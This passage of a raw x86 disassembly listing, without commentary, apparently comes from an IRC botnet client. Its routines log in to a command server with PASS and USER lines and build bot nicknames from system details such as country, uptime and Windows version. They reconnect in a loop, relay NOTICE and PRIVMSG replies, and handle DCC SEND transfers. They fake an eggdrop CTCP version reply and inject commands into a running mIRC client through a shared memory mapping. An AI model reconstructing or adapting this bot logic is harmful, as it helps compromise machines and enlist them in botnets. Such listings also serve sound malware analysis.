mov [ebp+var_8], edx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA40[eax]
push offset dword_41E868
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA44[eax]
push offset dword_41E968
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_8]
imul eax, 0Ch
cmp off_41DA48[eax], 0
jz short loc_40D020
mov eax, [ebp+var_8]
imul eax, 0Ch
push off_41DA48[eax]
push offset byte_41E6E8
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D020: ; CODE XREF: sub_40CF2F:loc_40CF99�j
; sub_40CF2F+D7�j
push offset dword_41E868
call sub_4105AD
pop ecx
push offset dword_41E968
call sub_4105AD
pop ecx
push offset byte_41E6E8
call sub_4105AD
pop ecx
leave
retn
sub_40CF2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D043 proc near ; CODE XREF: sub_40D366+7F�p
; sub_40D871+619�p
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push edi
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40668F
add esp, 0Ch
movsx eax, byte_41E6E8
test eax, eax
jz short loc_40D099
push offset byte_41E6E8
call sub_4105FB
pop ecx
push offset byte_41E6E8
push offset aPassS ; "PASS %s"
call sub_40D6CB
pop ecx
pop ecx
push offset byte_41E6E8
call sub_4105AD
pop ecx
loc_40D099: ; CODE XREF: sub_40D043+2D�j
cmp [ebp+arg_0], 0
jz loc_40D132
movsx eax, byte_41EE98
test eax, eax
jz short loc_40D0C3
push offset byte_41EE98
lea eax, [ebp+var_184]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D0D6
; ---------------------------------------------------------------------------
loc_40D0C3: ; CODE XREF: sub_40D043+69�j
lea eax, [ebp+var_184]
push eax
push offset byte_41EE98
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D0D6: ; CODE XREF: sub_40D043+7E�j
movsx eax, byte_41F018
test eax, eax
jz short loc_40D0F6
push offset byte_41F018
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_40D109
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_40D043+9C�j
lea eax, [ebp+var_104]
push eax
push offset byte_41F018
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D109: ; CODE XREF: sub_40D043+B1�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_40D6CB
add esp, 14h
loc_40D132: ; CODE XREF: sub_40D043+5A�j
cmp [ebp+arg_4], 0
jz loc_40D363
cmp [ebp+arg_0], 0
jz short loc_40D163
movsx eax, byte_41EE18
test eax, eax
jz short loc_40D163
push offset byte_41EE18
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40D363
; ---------------------------------------------------------------------------
loc_40D163: ; CODE XREF: sub_40D043+FD�j
; sub_40D043+108�j
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_188], eax
cmp [ebp+var_188], 4
jnb short loc_40D18D
call sub_406AE7
test eax, eax
jz loc_40D31F
loc_40D18D: ; CODE XREF: sub_40D043+13B�j
call sub_406A23
lea eax, [ebp+var_24C]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40D1B6
push offset aUnk ; "UNK"
lea eax, [ebp+var_24C]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D043+15E�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40D1CF
call sub_408E8E
mov [ebp+var_250], eax
jmp short loc_40D1D9
; ---------------------------------------------------------------------------
loc_40D1CF: ; CODE XREF: sub_40D043+17D�j
mov [ebp+var_250], 400h
loc_40D1D9: ; CODE XREF: sub_40D043+18A�j
mov eax, [ebp+var_250]
shr eax, 0Ah
mov [ebp+var_228], eax
call sub_408887
mov [ebp+var_18C], eax
mov [ebp+var_224], offset aB ; "B"
cmp [ebp+var_18C], 2EEh
jnb short loc_40D213
mov [ebp+var_224], offset aA ; "A"
loc_40D213: ; CODE XREF: sub_40D043+1C4�j
cmp [ebp+var_18C], 1F4h
jnb short loc_40D229
mov [ebp+var_224], offset aG ; "G"
loc_40D229: ; CODE XREF: sub_40D043+1DA�j
and [ebp+var_22C], 0
mov [ebp+var_220], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_21C]
rep stosd
lea eax, [ebp+var_220]
push eax
call dword_417030 ; GetVersionExA
cmp [ebp+var_21C], 5
jnz short loc_40D270
cmp [ebp+var_218], 1
jnz short loc_40D270
mov [ebp+var_22C], 1
loc_40D270: ; CODE XREF: sub_40D043+218�j
; sub_40D043+221�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_22C], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_224]
push [ebp+var_228]
push 5Dh
push [ebp+var_188]
push 5Bh
push 5Dh
lea eax, [ebp+var_24C]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_80]
push eax
call sub_416B5E ; sprintf
add esp, 34h
movsx eax, byte_41DB00
test eax, eax
jz short loc_40D31D
push offset byte_41DB00
push offset dword_41DA80
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41DA80
call sub_4105FB
pop ecx
movsx eax, byte_41DB80
test eax, eax
jz short loc_40D31D
push offset byte_41DB80
push offset dword_41ED18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41ED18
call sub_4105FB
pop ecx
loc_40D31D: ; CODE XREF: sub_40D043+295�j
; sub_40D043+2BC�j
jmp short loc_40D343
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40D043+144�j
push offset dword_41DA70
lea eax, [ebp+var_80]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_40D7E5
pop ecx
loc_40D343: ; CODE XREF: sub_40D043:loc_40D31D�j
lea eax, [ebp+var_80]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
push offset byte_41EE18
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40D363: ; CODE XREF: sub_40D043+F3�j
; sub_40D043+11B�j
pop edi
leave
retn
sub_40D043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D366 proc near ; CODE XREF: sub_40A9CF+1521�p
; sub_40D871+4A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF2F
add esp, 0Ch
push dword_41E974
call sub_40538D
pop ecx
mov [ebp+var_4], 0EA60h
loc_40D38E: ; CODE XREF: sub_40D366:loc_40D419�j
push offset dword_41E868
call sub_4105FB
pop ecx
push offset dword_41E968
call sub_4105FB
pop ecx
push 2710h
push 1
push offset dword_41E968
push offset dword_41E868
call sub_4050EA
add esp, 10h
mov dword_41E974, eax
push offset dword_41E868
call sub_4105AD
pop ecx
push offset dword_41E968
call sub_4105AD
pop ecx
cmp dword_41E974, 0
jz short loc_40D3EE
push 1
push 1
call sub_40D043
pop ecx
pop ecx
jmp short locret_40D41E
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40D366+79�j
push 0
push 0
push 0
call sub_40CF2F
add esp, 0Ch
push [ebp+var_4]
call dword_41709C ; Sleep
cmp [ebp+var_4], 0A4CB80h
jge short loc_40D419
mov eax, [ebp+var_4]
add eax, 0EA60h
mov [ebp+var_4], eax
loc_40D419: ; CODE XREF: sub_40D366+A6�j
jmp loc_40D38E
; ---------------------------------------------------------------------------
locret_40D41E: ; CODE XREF: sub_40D366+86�j
leave
retn
sub_40D366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4020C2+1DE�p
; sub_40A9CF+1219�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E974
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4AB proc near ; CODE XREF: sub_4020C2+21B�p
; sub_40332B+1A6�p ...
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1004]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_1008], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_1008]
push eax
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E974
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D4AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D53F proc near ; CODE XREF: sub_401244+51�p
; sub_401244+41E�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_40D55F
jmp locret_40D6C9
; ---------------------------------------------------------------------------
loc_40D55F: ; CODE XREF: sub_40D53F+19�j
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 1
jnz short loc_40D58F
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40D53F+2E�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jnz short loc_40D5BB
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A058
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40D53F+5A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D5E7
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A048
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5E7: ; CODE XREF: sub_40D53F+86�j
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
loc_40D605: ; CODE XREF: sub_40D53F+4E�j
; sub_40D53F+7A�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax+19Fh], 0
jz short loc_40D63C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D629
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D63C
loc_40D629: ; CODE XREF: sub_40D53F+DC�j
push offset dword_41A03C
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D63C: ; CODE XREF: sub_40D53F+D0�j
; sub_40D53F+E8�j
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D680
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D693
loc_40D680: ; CODE XREF: sub_40D53F+133�j
push offset dword_41A038
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
loc_40D693: ; CODE XREF: sub_40D53F+13F�j
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E974
call sub_4053BF
add esp, 0Ch
locret_40D6C9: ; CODE XREF: sub_40D53F+1B�j
leave
retn
sub_40D53F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CB proc near ; CODE XREF: sub_40332B+205�p
; sub_40332B+212�p ...
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_416BC0
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push 1000h
lea eax, [ebp+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E974
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D734 proc near ; CODE XREF: sub_40D74D:loc_40D75E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push offset aMirc ; "mIRC"
call dword_4171E8 ; FindWindowA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40D734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D74D proc near ; CODE XREF: sub_40A9CF+926�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jnz short loc_40D75E
jmp locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: sub_40D74D+A�j
call sub_40D734
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40D76E
jmp short locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D76E: ; CODE XREF: sub_40D74D+1D�j
push offset aMirc ; "mIRC"
push 1000h
push 0
push 4
push 0
push 0FFFFFFFFh
call dword_4170C0 ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0F001Fh
push [ebp+var_8]
call dword_4170BC ; MapViewOfFile
mov [ebp+var_C], eax
push [ebp+arg_0]
push [ebp+var_C]
call sub_416B5E ; sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call dword_4171EC ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call dword_4171EC ; SendMessageA
push [ebp+var_C]
call dword_4170B8 ; UnmapViewOfFile
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40D7E3: ; CODE XREF: sub_40D74D+C�j
; sub_40D74D+1F�j
leave
retn
sub_40D74D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40A9CF+E3�p
; sub_40D043+2FA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40D803
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: sub_40D7E5:loc_40D86D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40D803: ; CODE XREF: sub_40D7E5+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short locret_40D86F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40D82E
push 39h
push 30h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7E5+32�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40D86D
call sub_410483
test eax, eax
jz short loc_40D85A
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D85A: ; CODE XREF: sub_40D7E5+5E�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
loc_40D86D: ; CODE XREF: sub_40D7E5+47�j
; sub_40D7E5+55�j ...
jmp short loc_40D7FC
; ---------------------------------------------------------------------------
locret_40D86F: ; CODE XREF: sub_40D7E5+24�j
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D871 proc near ; CODE XREF: sub_40E618+321�p
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = byte ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = byte ptr -7BCh
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_4B4 = byte ptr -4B4h
var_490 = byte ptr -490h
var_390 = byte ptr -390h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_213 = byte ptr -213h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_95 = dword ptr -95h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 7E8h
push edi
push offset aPing ; "PING"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8A7
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
push offset aPongS ; "PONG %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8A7: ; CODE XREF: sub_40D871+1D�j
push offset aPong ; "PONG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8C2
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D871+4A�j
push offset aMode ; "MODE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8DD
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8DD: ; CODE XREF: sub_40D871+65�j
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DB2D
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz loc_40DB2D
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax+1]
cmp eax, 1
jnz loc_40DB2D
push offset dword_41A14C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jz loc_40DA81
push offset aSend ; "SEND"
mov eax, [ebp+arg_C]
push dword ptr [eax+10h]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
cmp [ebp+arg_0], 0
jz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+14h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+18h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+1Ch], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+20h], 0
jnz short loc_40D98B
loc_40D986: ; CODE XREF: sub_40D871+F8�j
; sub_40D871+101�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D98B: ; CODE XREF: sub_40D871+113�j
mov eax, [ebp+arg_C]
mov eax, [eax+14h]
movsx eax, byte ptr [eax]
cmp eax, 22h
jnz short loc_40D99E
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D871+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+20h]
and byte ptr [ecx+eax], 0
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41DA80
lea eax, [ebp+var_213]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_113], 0
push 7Ah
push 0
lea eax, [ebp+var_10F]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_95], 1
mov eax, [ebp+arg_C]
push dword ptr [eax+18h]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_238], eax
movzx eax, byte ptr [ebp+var_238]
push eax
mov eax, [ebp+var_238]
shr eax, 8
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 10h
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 18h
movzx eax, al
push eax
push offset dword_418A50
lea eax, [ebp+var_248]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
mov eax, [ebp+arg_C]
push dword ptr [eax+1Ch]
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax+14h]
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_4024F3
add esp, 18h
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D871+BA�j
; sub_40D871+C7�j ...
push offset dword_41A138
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DAAD
push offset dword_41A12C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAEB
loc_40DAAD: ; CODE XREF: sub_40D871+224�j
cmp [ebp+arg_0], 0
jz short loc_40DAD1
push offset dword_41DC00
push 3B7h
push 0
push offset dword_41A108
push [ebp+arg_4]
call sub_40D420
add esp, 14h
jmp short loc_40DAE6
; ---------------------------------------------------------------------------
loc_40DAD1: ; CODE XREF: sub_40D871+240�j
push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_41A0E8
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
loc_40DAE6: ; CODE XREF: sub_40D871+25E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DAEB: ; CODE XREF: sub_40D871+23A�j
push offset dword_41A0E0
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz short loc_40DB16
push offset dword_41A0D8
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call dword_417108 ; lstrcmp
test eax, eax
jnz short loc_40DB2D
loc_40DB16: ; CODE XREF: sub_40D871+28E�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DB2D: ; CODE XREF: sub_40D871+80�j
; sub_40D871+8D�j ...
push offset a433 ; "433"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz loc_40DCFD
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_2CC], eax
cmp [ebp+var_2CC], 4
jnb short loc_40DB71
call sub_406AE7
test eax, eax
jz loc_40DCB8
loc_40DB71: ; CODE XREF: sub_40D871+2F1�j
call sub_406A23
lea eax, [ebp+var_390]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40DB9A
push offset aUnk ; "UNK"
lea eax, [ebp+var_390]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40DB9A: ; CODE XREF: sub_40D871+314�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40DBB3
call sub_408E8E
mov [ebp+var_7E4], eax
jmp short loc_40DBBD
; ---------------------------------------------------------------------------
loc_40DBB3: ; CODE XREF: sub_40D871+333�j
mov [ebp+var_7E4], 400h
loc_40DBBD: ; CODE XREF: sub_40D871+340�j
mov eax, [ebp+var_7E4]
shr eax, 0Ah
mov [ebp+var_36C], eax
call sub_408887
mov [ebp+var_2D0], eax
mov [ebp+var_368], offset aB ; "B"
cmp [ebp+var_2D0], 3E8h
jnb short loc_40DBF7
mov [ebp+var_368], offset aA ; "A"
loc_40DBF7: ; CODE XREF: sub_40D871+37A�j
cmp [ebp+var_2D0], 1F4h
jnb short loc_40DC0D
mov [ebp+var_368], offset aG ; "G"
loc_40DC0D: ; CODE XREF: sub_40D871+390�j
and [ebp+var_370], 0
mov [ebp+var_364], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_360]
rep stosd
lea eax, [ebp+var_364]
push eax
call dword_417030 ; GetVersionExA
cmp [ebp+var_360], 5
jnz short loc_40DC54
cmp [ebp+var_35C], 1
jnz short loc_40DC54
mov [ebp+var_370], 1
loc_40DC54: ; CODE XREF: sub_40D871+3CE�j
; sub_40D871+3D7�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_370], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
